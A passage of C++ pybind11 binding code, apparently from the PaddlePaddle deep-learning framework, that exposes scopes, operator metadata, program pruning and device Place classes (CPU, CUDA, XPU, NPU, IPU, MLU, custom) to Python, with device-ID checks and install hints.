Find or create variable named :code:`name` in the current scope.
If the variable named :code:`name` does not exist in the
current scope, the variable would be created. Otherwise,
return the existing variable.
Args:
name (str): the variable name.
Returns:
out (core.Variable): the found or created variable.
)DOC",
py::return_value_policy::reference)
.def("find_var", &Scope::FindVar, py::arg("name"),
R"DOC(
Find variable named :code:`name` in the current scope or
its parent scope. Return None if not found.
Args:
name (str): the variable name.
Returns:
out (core.Variable|None): the found variable or None.
)DOC",
py::return_value_policy::reference)
.def("erase", &Scope::EraseVars, py::arg("names"),
R"DOC(
Erase the variables with the given names from the current scope.
Args:
names (list[str]): the variable names to be erased.
Returns:
None
)DOC",
py::return_value_policy::reference)
.def("new_scope", [](Scope &self) -> Scope * { return &self.NewScope(); },
R"DOC(
Create a new sub-scope of the current scope.
Returns:
out (core._Scope): the created sub-scope.
)DOC",
py::return_value_policy::reference)
.def("drop_kids", &Scope::DropKids,
R"DOC(
Delete all sub-scopes of the current scope.
)DOC")
.def("_kids", &Scope::kids);
m.def("Scope",
[]() -> Scope * {
auto *s = new Scope();
ScopePool::Instance().Insert(std::unique_ptr<Scope>(s));
return s;
},
R"DOC(
Create a new scope.
Returns:
out (core._Scope): the created scope.
)DOC",
py::return_value_policy::reference);
//! @note: Be careful! PyBind will return std::string as a unicode object,
//! not a Python str. If you want a str object, you should cast it in Python.
m.def("get_all_op_protos", []() -> std::vector<py::bytes> {
std::vector<py::bytes> ret_values;
for (auto &iter : OpInfoMap::Instance().map()) {
auto &info = iter.second;
if (info.HasOpProtoAndChecker()) {
std::string str;
PADDLE_ENFORCE_EQ(
info.Proto().SerializeToString(&str), true,
platform::errors::Fatal(
"Serialize OpProto Error. This could be a bug of Paddle."));
ret_values.emplace_back(str);
}
}
return ret_values;
});
m.def("get_op_attrs_default_value",
[](py::bytes byte_name) -> paddle::framework::AttributeMap {
std::string op_type = byte_name;
paddle::framework::AttributeMap res;
auto info = OpInfoMap::Instance().GetNullable(op_type);
if (info != nullptr) {
if (info->HasOpProtoAndChecker()) {
auto op_checker = info->Checker();
res = op_checker->GetDefaultAttrsMap();
}
}
return res;
});
m.def(
"get_grad_op_desc", [](const OpDesc &op_desc,
const std::unordered_set<std::string> &no_grad_set,
const std::vector<BlockDesc *> &grad_sub_block) {
std::unordered_map<std::string, std::string> grad_to_var;
std::vector<std::unique_ptr<OpDesc>> grad_op_descs =
framework::OpInfoMap::Instance()
.Get(op_desc.Type())
.GradOpMaker()(op_desc, no_grad_set, &grad_to_var,
grad_sub_block);
std::vector<OpDesc *> grad_op_desc_ptrs(grad_op_descs.size());
std::transform(grad_op_descs.begin(), grad_op_descs.end(),
grad_op_desc_ptrs.begin(),
[](std::unique_ptr<OpDesc> &p) { return p.release(); });
return std::make_pair(grad_op_desc_ptrs, grad_to_var);
});
m.def("has_grad_op_maker", [](const std::string op_type) {
return framework::OpInfoMap::Instance().Get(op_type).HasGradOpMaker();
});
m.def("has_non_empty_grad_op_maker", [](const std::string op_type) {
return framework::OpInfoMap::Instance()
.Get(op_type)
.HasNonEmptyGradOpMaker();
});
m.def("has_infer_inplace", [](const std::string op_type) {
return framework::OpInfoMap::Instance().Get(op_type).HasInferInplace();
});
m.def("infer_no_need_buffer_slots",
[](const std::string op_type, const framework::VariableNameMap &inputs,
const framework::VariableNameMap &outputs,
const framework::AttributeMap &attrs) {
auto infer_func = framework::OpInfoMap::Instance()
.Get(op_type)
.NoNeedBufferVarsInferer();
if (infer_func) {
return infer_func(inputs, outputs, attrs);
} else {
std::unordered_set<std::string> empty = {};
return empty;
}
});
m.def("prune", [](const ProgramDesc &origin,
const std::set<std::string> &feeded_var_names,
const std::vector<std::array<size_t, 2>> &targets) {
ProgramDesc prog_with_targets(origin);
for (const auto &t : targets) {
prog_with_targets.MutableBlock(t[0])->Op(t[1])->SetIsTarget(true);
}
proto::ProgramDesc pruned_desc;
auto pruned_origin_block_id_map =
Prune(*prog_with_targets.Proto(), feeded_var_names, &pruned_desc);
return std::make_tuple(ProgramDesc(pruned_desc),
pruned_origin_block_id_map);
});
m.def("prune_backward",
[](const framework::ProgramDesc &program) {
return PruneBackward(program);
},
R"DOC(
Prune the backward part of a program, mostly called in
program.clone(for_test=True).
Args:
program (ProgramDesc): The original program.
Returns:
tuple(ProgramDesc, map<int, int>): The first part is
the pruned program desc, and the second part is a map
which contains the id pair of pruned block and corresponding
origin block.
)DOC");
m.def("empty_var_name",
[]() { return std::string(framework::kEmptyVarName); });
m.def("grad_var_suffix",
[]() { return std::string(framework::kGradVarSuffix); });
m.def_submodule(
"var_names",
"The module will return special predefined variable name in Paddle")
.def("empty", []() { return kEmptyVarName; })
.def("temp", []() { return kTempVarName; });
// clang-format off
py::class_<paddle::platform::DeviceContext>(m, "DeviceContext")
.def_static("create",
[](paddle::platform::CPUPlace& place)
-> paddle::platform::DeviceContext* {
auto* context = new paddle::platform::CPUDeviceContext();
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place)
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
return context;
})
.def_static("create",
[](paddle::platform::XPUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_XPU
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use XPUPlace in CPU/GPU version, "
"Please recompile or reinstall Paddle with XPU support."));
#else
auto* context = new paddle::platform::XPUDeviceContext(place);
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place)
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
return context;
#endif
})
.def_static("create",
[](paddle::platform::MLUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_MLU
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use MLUPlace in CPU/GPU version, "
"Please recompile or reinstall Paddle with MLU support."));
#else
return new paddle::platform::MLUDeviceContext(place);
#endif
})
.def_static("create",
[](paddle::platform::NPUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_ASCEND_CL
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use NPUPlace in CPU/GPU/XPU version, "
"Please recompile or reinstall Paddle with NPU support."));
#else
return new paddle::platform::NPUDeviceContext(place);
#endif
})
.def_static("create",
[](paddle::platform::CUDAPlace& place)
-> paddle::platform::DeviceContext* {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use CUDAPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#else
auto* context = new paddle::platform::CUDADeviceContext(place);
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place, context->stream())
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
context->PartialInitWithAllocator();
return context;
#endif
})
.def_static("create",
[](paddle::platform::CUDAPinnedPlace& place)
-> paddle::platform::DeviceContext* {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use CUDAPinnedPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#else
return new paddle::platform::CUDAPinnedDeviceContext(place);
#endif
});
// clang-format on
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
py::class_<platform::Communicator>(m, "Communicator").def(py::init<>());
#endif
m.def("get_all_device_type", []() {
std::vector<std::string> device_types;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
device_types = platform::DeviceManager::GetAllDeviceTypes();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_all_device_type because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_all_device_type, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return device_types;
});
m.def("get_all_custom_device_type", []() {
std::vector<std::string> device_types;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
device_types = platform::DeviceManager::GetAllCustomDeviceTypes();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_all_custom_device_type because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_all_custom_device_type, please try to "
"install CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return device_types;
});
m.def("get_available_device", [] {
std::vector<std::string> devices;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
devices = platform::DeviceManager::GetAllDeviceList();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_available_device because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_available_device, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return devices;
});
m.def("get_available_custom_device", [] {
std::vector<std::string> devices;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
devices = platform::DeviceManager::GetAllCustomDeviceList();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_available_custom_device because you have "
"installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_available_custom_device, please try to "
"install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return devices;
});
py::class_<platform::CustomPlace>(m, "CustomPlace",
R"DOC(
CustomPlace is a descriptor of a device.
It represents a custom device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
fake_cpu_place = paddle.CustomPlace("FakeCPU", 0)
)DOC")
.def("__init__",
[](platform::CustomPlace &self, const std::string &device_type,
int dev_id) {
#ifdef PADDLE_WITH_CUSTOM_DEVICE
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), device id must be 0 "
"or "
"positive integer",
device_type, dev_id);
std::exit(-1);
}
if (LIKELY(platform::DeviceManager::HasDeviceType(device_type) &&
platform::DeviceManager::IsCustom(device_type))) {
int dev_count = static_cast<int>(
platform::DeviceManager::GetDeviceCount(device_type));
if (UNLIKELY(dev_id >= dev_count)) {
if (dev_count == 0) {
LOG(ERROR) << "Cannot use " << device_type
<< " because there is no " << device_type
<< " detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), dev_id must "
"inside "
"[0, %d), because %s "
"number on your machine is %d",
device_type, dev_id, dev_count, device_type, dev_count);
std::exit(-1);
}
}
new (&self) platform::CustomPlace(device_type, dev_id);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), the device type is "
"not registered "
"as a custom device.",
device_type, dev_id);
std::exit(-1);
}
#else
LOG(ERROR) << string::Sprintf(
"Cannot use CustomDevice because you have installed CPU/GPU"
"version PaddlePaddle.\n"
"If you want to use CustomDevice, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n"
"If you only have CPU, please change "
"CustomPlace(%s, %d) to be CPUPlace().\n",
device_type, dev_id);
std::exit(-1);
#endif
})
.def("get_device_id",
[](const platform::CustomPlace &self) { return self.GetDeviceId(); })
.def("get_device_type",
[](const platform::CustomPlace &self) {
return self.GetDeviceType();
})
.def("__repr__", string::to_string<const platform::CustomPlace &>)
.def("__str__", string::to_string<const platform::CustomPlace &>);
py::class_<platform::CUDAPlace> cudaplace(m, "CUDAPlace", R"DOC(
CUDAPlace is a descriptor of a device.
    It represents a GPU device on which a Tensor or LoDTensor is allocated or will be allocated.
    Each CUDAPlace has a dev_id to indicate the graphics card ID represented by the current CUDAPlace,
    starting from 0.
    The memory of CUDAPlaces with different dev_ids is not mutually accessible.
    Numbering here refers to the logical ID of the visible graphics card, not the actual ID of the graphics card.
    You can set visible GPU devices by setting the `CUDA_VISIBLE_DEVICES` environment variable.
    When the program starts, visible GPU devices will be numbered from 0.
    If `CUDA_VISIBLE_DEVICES` is not set, all devices are visible by default,
    and the logical ID is the same as the actual ID.
Parameters:
id (int): GPU device ID.
Examples:
.. code-block:: python
import paddle
place = paddle.CUDAPlace(0)
)DOC");
g_cudaplace_pytype = reinterpret_cast<PyTypeObject *>(cudaplace.ptr());
cudaplace
.def("__init__",
[](platform::CUDAPlace &self, int dev_id) {
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid CUDAPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetGPUDeviceCount())) {
if (platform::GetGPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use GPU because there is no GPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CUDAPlace(%d), must inside [0, %d), because GPU "
"number on your machine is %d",
dev_id, platform::GetGPUDeviceCount(),
platform::GetGPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::CUDAPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use GPU because you have installed CPU version "
"PaddlePaddle.\n"
"If you want to use GPU, please try to install GPU version "
"PaddlePaddle by: pip install paddlepaddle-gpu\n"
"If you only have CPU, please change CUDAPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
.def("get_device_id",
[](const platform::CUDAPlace &self) { return self.GetDeviceId(); })
.def("_type", &PlaceIndex<platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::MLUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPlace, platform::CUDAPinnedPlace>)
.def("_get_device_id",
[](platform::CUDAPlace &self) -> int { return self.GetDeviceId(); })
#endif
.def("__repr__", string::to_string<const platform::CUDAPlace &>)
.def("__str__", string::to_string<const platform::CUDAPlace &>);
py::class_<platform::XPUPlace> xpuplace(m, "XPUPlace", R"DOC(
    XPUPlace is a descriptor of a device.
    It represents an XPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle.fluid as fluid
xpu_place = fluid.XPUPlace(0)
)DOC");
g_xpuplace_pytype = reinterpret_cast<PyTypeObject *>(xpuplace.ptr());
xpuplace
.def("__init__",
[](platform::XPUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_XPU
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid XPUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetXPUDeviceCount())) {
if (platform::GetXPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use XPU because there is no XPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid XPUPlace(%d), must inside [0, %d), because XPU "
"number on your machine is %d",
dev_id, platform::GetXPUDeviceCount(),
platform::GetXPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::XPUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use XPU because you have installed CPU/GPU version "
"PaddlePaddle.\n"
"If you want to use XPU, please try to install XPU version "
"PaddlePaddle by: pip install paddlepaddle-xpu\n"
"If you only have CPU, please change XPUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
#ifdef PADDLE_WITH_XPU
.def("_type", &PlaceIndex<platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::XPUPlace>)
.def("_equals",
&IsSamePlace<platform::XPUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::XPUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__repr__", string::to_string<const platform::XPUPlace &>)
.def("__str__", string::to_string<const platform::XPUPlace &>);
#ifdef PADDLE_WITH_XPU
py::enum_<phi::backends::xpu::XPUVersion>(m, "XPUVersion", py::arithmetic())
.value("XPU1", phi::backends::xpu::XPUVersion::XPU1)
.value("XPU2", phi::backends::xpu::XPUVersion::XPU2)
.export_values();
m.def("get_xpu_device_count", platform::GetXPUDeviceCount);
m.def("get_xpu_device_version",
[](int device_id) { return platform::get_xpu_version(device_id); });
m.def("get_xpu_device_op_support_types",
[](const std::string &op_name, phi::backends::xpu::XPUVersion version) {
return platform::get_xpu_op_support_type(op_name, version);
});
m.def("get_xpu_device_op_list", [](phi::backends::xpu::XPUVersion version) {
return platform::get_xpu_op_list(version);
});
m.def("is_float16_supported", [](const platform::XPUPlace &place) -> bool {
    // XPUs newer than XPU1 (i.e., XPU2 and later) support float16 and bfloat16
return platform::get_xpu_version(place.device) >
phi::backends::xpu::XPUVersion::XPU1;
});
m.def("is_bfloat16_supported", [](const platform::XPUPlace &place) -> bool {
    // XPUs newer than XPU1 (i.e., XPU2 and later) support float16 and bfloat16
return platform::get_xpu_version(place.device) >
phi::backends::xpu::XPUVersion::XPU1;
});
#endif
py::class_<paddle::platform::CPUPlace> cpuplace(m, "CPUPlace", R"DOC(
CPUPlace is a descriptor of a device.
It represents a CPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
cpu_place = paddle.CPUPlace()
)DOC");
g_cpuplace_pytype = reinterpret_cast<PyTypeObject *>(cpuplace.ptr());
cpuplace.def(py::init<>())
.def("_type", &PlaceIndex<platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::CPUPlace>)
.def("_equals",
&IsSamePlace<platform::CPUPlace, platform::CUDAPinnedPlace>)
.def("__repr__", string::to_string<const platform::CPUPlace &>)
.def("__str__", string::to_string<const platform::CPUPlace &>);
py::class_<paddle::platform::CUDAPinnedPlace> cudapinnedplace(
m, "CUDAPinnedPlace", R"DOC(
CUDAPinnedPlace is a descriptor of a device.
    It refers to the page-locked memory allocated by the CUDA function `cudaHostAlloc()` in the host memory.
    The host operating system will not page out or swap this memory.
    It can be accessed through direct memory access technology to speed up the copying of data between the host and GPU.
For more information on CUDA data transfer and `pinned memory`,
please refer to `official document <https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html#pinned-memory>`_ .
Examples:
.. code-block:: python
import paddle
place = paddle.CUDAPinnedPlace()
)DOC");
g_cudapinnedplace_pytype =
reinterpret_cast<PyTypeObject *>(cudapinnedplace.ptr());
cudapinnedplace
.def("__init__",
[](platform::CUDAPinnedPlace &self) {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(platform::errors::PermissionDenied(
"Cannot use CUDAPinnedPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#endif
new (&self) platform::CUDAPinnedPlace();
})
.def("_type", &PlaceIndex<platform::CUDAPinnedPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPinnedPlace, platform::Place>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CUDAPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::XPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::NPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CUDAPinnedPlace>)
.def("__repr__", string::to_string<const platform::CUDAPinnedPlace &>)
.def("__str__", string::to_string<const platform::CUDAPinnedPlace &>);
// NPUPlace
py::class_<platform::NPUPlace> npuplace(m, "NPUPlace", R"DOC(
NPUPlace is a descriptor of a device.
    It represents an NPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
npu_place = paddle.NPUPlace(0)
)DOC");
g_npuplace_pytype = reinterpret_cast<PyTypeObject *>(npuplace.ptr());
npuplace
.def("__init__",
[](platform::NPUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_ASCEND_CL
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid NPUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetNPUDeviceCount())) {
if (platform::GetNPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use NPU because there is no NPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid NPUPlace(%d), must inside [0, %d), because NPU "
"number on your machine is %d",
dev_id, platform::GetNPUDeviceCount(),
platform::GetNPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::NPUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use NPU because you have installed CPU/GPU version "
"PaddlePaddle.\n"
"If you want to use NPU, please try to install NPU version "
"PaddlePaddle by: pip install paddlepaddle-npu\n"
"If you only have CPU, please change NPUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::NPUPlace>)
.def("_equals",
&IsSamePlace<platform::NPUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::NPUPlace &self) { return self.GetDeviceId(); })
.def("__str__", string::to_string<const platform::NPUPlace &>);
// IPUPlace
py::class_<platform::IPUPlace>(m, "IPUPlace", R"DOC(
IPUPlace is a descriptor of a device.
    It represents an IPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
# required: ipu
ipu_place = paddle.IPUPlace()
)DOC")
.def("__init__",
[](platform::IPUPlace &self) {
#ifdef PADDLE_WITH_IPU
if (platform::GetIPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use IPU because there is no IPU "
"detected on your "
"machine.";
std::exit(-1);
}
           // Use ipu(0) to compile; at run time the device count the user
           // configures in sharding and pipelining is used.
new (&self) platform::IPUPlace(0);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use IPU because you didn't install IPU version "
"PaddlePaddle.\n"
"If you want to use IPU, please try to install IPU version "
"PaddlePaddle by: pip install paddlepaddle*\n"
"If you only have CPU, please change IPUPlace to be "
"CPUPlace().\n");
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::IPUPlace>)
.def("_equals",
&IsSamePlace<platform::IPUPlace, platform::CUDAPinnedPlace>)
#ifdef PADDLE_WITH_IPU
.def("get_device_id",
[](const platform::IPUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__str__", string::to_string<const platform::IPUPlace &>);
// MLUPlace
py::class_<platform::MLUPlace> mluplace(m, "MLUPlace", R"DOC(
MLUPlace is a descriptor of a device.
    It represents an MLU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
# required: mlu
mlu_place = paddle.MLUPlace(0)
)DOC");
g_mluplace_pytype = reinterpret_cast<PyTypeObject *>(mluplace.ptr());
mluplace
.def("__init__",
[](platform::MLUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_MLU
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid MLUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetMLUDeviceCount())) {
if (platform::GetMLUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use MLU because there is no MLU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid MLUPlace(%d), must inside [0, %d), because MLU "
"number on your machine is %d",
dev_id, platform::GetMLUDeviceCount(),
platform::GetMLUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::MLUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use MLU because you have installed CPU/GPU/... "
"version "
"PaddlePaddle.\n"
"If you want to use MLU, please try to install MLU version "
"PaddlePaddle by: pip install paddlepaddle-mlu\n"
"If you only have CPU, please change MLUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::MLUPlace>)
#ifdef PADDLE_WITH_MLU
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::MLUPlace>)
.def("_equals",
&IsSamePlace<platform::MLUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::MLUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__str__", string::to_string<const platform::MLUPlace &>);
py::class_<platform::Place> platformplace(m, "Place");
g_place_pytype = reinterpret_cast<PyTypeObject *>(platformplace.ptr());
platformplace.def(py::init<>())
.def("_type", &PlaceIndex<platform::Place>)
.def("_equals", &IsSamePlace<platform::Place, platform::Place>)
.def("_equals", &IsSamePlace<platform::Place, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::CUDAPinnedPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::MLUPlace>)
.def("is_gpu_place",
[](platform::Place &self) { return platform::is_gpu_place(self); })
.def("is_cpu_place",
[](platform::Place &self) { return platform::is_cpu_place(self); })
.def("is_xpu_place",
[](platform::Place &self) { return platform::is_xpu_place(self); })
.def("is_npu_place",
[](platform::Place &self) { return platform::is_npu_place(self); })
.def("is_ipu_place",
[](platform::Place &self) { return platform::is_ipu_place(self); })
.def("is_cuda_pinned_place",
[](platform::Place &self) {
return platform::is_cuda_pinned_place(self);
})
.def("is_mlu_place",
[](platform::Place &self) { return platform::is_mlu_place(self); })
.def(
"is_custom_place",
[](platform::Place &self) { return platform::is_custom_place(self); })
.def("gpu_device_id", [](platform::Place &self) { return self.device; })
.def("xpu_device_id", [](platform::Place &self) { return self.device; })
.def("npu_device_id", [](platform::Place &self) { return self.device; })
.def("ipu_device_id", [](platform::Place &self) { return self.device; })
.def("mlu_device_id", [](platform::Place &self) { return self.device; })
.def("custom_device_id",
[](platform::Place &self) { return self.device; })
.def("set_place", [](platform::Place &self,
const platform::Place &other) { self = other; })
.def("set_place",
[](platform::Place &self, const platform::CPUPlace &cpu_place) {
self = cpu_place;
})
.def("set_place",
[](platform::Place &self, const platform::XPUPlace &xpu_place) {
self = xpu_place;
})
.def("set_place",
[](platform::Place &self, const platform::CUDAPlace &gpu_place) {
self = gpu_place;
})
.def("set_place",
[](platform::Place &self,
const platform::CUDAPinnedPlace &cuda_pinned_place) {
self = cuda_pinned_place;
})
.def("set_place",
[](platform::Place &self, const platform::NPUPlace &npu_place) {
self = npu_place;
})
.def("set_place",
[](platform::Place &self, const platform::IPUPlace &ipu_place) {
self = ipu_place;
})
.def("set_place",
[](platform::Place &self, const platform::MLUPlace &mlu_place) {
self = mlu_place;
})
.def("set_place",
[](platform::Place &self, const platform::CustomPlace &plug_place) {
self = plug_place;
})
.def("__repr__", string::to_string<const platform::Place &>)
.def("__str__", string::to_string<const platform::Place &>);
py::class_<OperatorBase>(m, "Operator")
.def_static("create",
[](py::bytes protobin) {
proto::OpDesc desc;
PADDLE_ENFORCE_EQ(desc.ParsePartialFromString(protobin),
true,
platform::errors::InvalidArgument(
"Cannot parse user input to OpDesc"));
PADDLE_ENFORCE_EQ(desc.IsInitialized(), true,
